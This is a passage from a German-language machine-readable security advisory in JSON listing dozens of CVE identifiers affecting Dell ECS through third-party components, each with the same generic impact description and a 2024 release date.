"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-1945"
},
{
"cve": "CVE-2020-1967",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-1967"
},
{
"cve": "CVE-2020-1971",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-1971"
},
{
"cve": "CVE-2020-24616",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-24616"
},
{
"cve": "CVE-2020-24750",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-24750"
},
{
"cve": "CVE-2020-25649",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-25649"
},
{
"cve": "CVE-2020-25658",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-25658"
},
{
"cve": "CVE-2020-26116",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-26116"
},
{
"cve": "CVE-2020-26137",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-26137"
},
{
"cve": "CVE-2020-26541",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-26541"
},
{
"cve": "CVE-2020-27216",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-27216"
},
{
"cve": "CVE-2020-27218",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-27218"
},
{
"cve": "CVE-2020-27223",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-27223"
},
{
"cve": "CVE-2020-28366",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-28366"
},
{
"cve": "CVE-2020-28493",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-28493"
},
{
"cve": "CVE-2020-29509",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-29509"
},
{
"cve": "CVE-2020-29511",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-29511"
},
{
"cve": "CVE-2020-29582",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-29582"
},
{
"cve": "CVE-2020-29651",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-29651"
},
{
"cve": "CVE-2020-35490",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-35490"
},
{
"cve": "CVE-2020-35491",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-35491"
},
{
"cve": "CVE-2020-35728",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-35728"
},
{
"cve": "CVE-2020-36179",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36179"
},
{
"cve": "CVE-2020-36180",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36180"
},
{
"cve": "CVE-2020-36181",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36181"
},
{
"cve": "CVE-2020-36182",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36182"
},
{
"cve": "CVE-2020-36183",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36183"
},
{
"cve": "CVE-2020-36184",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36184"
},
{
"cve": "CVE-2020-36185",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36185"
},
{
"cve": "CVE-2020-36186",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36186"
},
{
"cve": "CVE-2020-36187",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36187"
},
{
"cve": "CVE-2020-36188",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36188"
},
{
"cve": "CVE-2020-36189",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36189"
},
{
"cve": "CVE-2020-36516",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36516"
},
{
"cve": "CVE-2020-36518",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36518"
},
{
"cve": "CVE-2020-36557",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36557"
},
{
"cve": "CVE-2020-36558",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36558"
},
{
"cve": "CVE-2020-36691",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-36691"
},
{
"cve": "CVE-2020-7238",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-7238"
},
{
"cve": "CVE-2020-8840",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-8840"
},
{
"cve": "CVE-2020-8908",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-8908"
},
{
"cve": "CVE-2020-8911",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-8911"
},
{
"cve": "CVE-2020-8912",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-8912"
},
{
"cve": "CVE-2020-9488",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-9488"
},
{
"cve": "CVE-2020-9493",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2020-9493"
},
{
"cve": "CVE-2020-9546",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
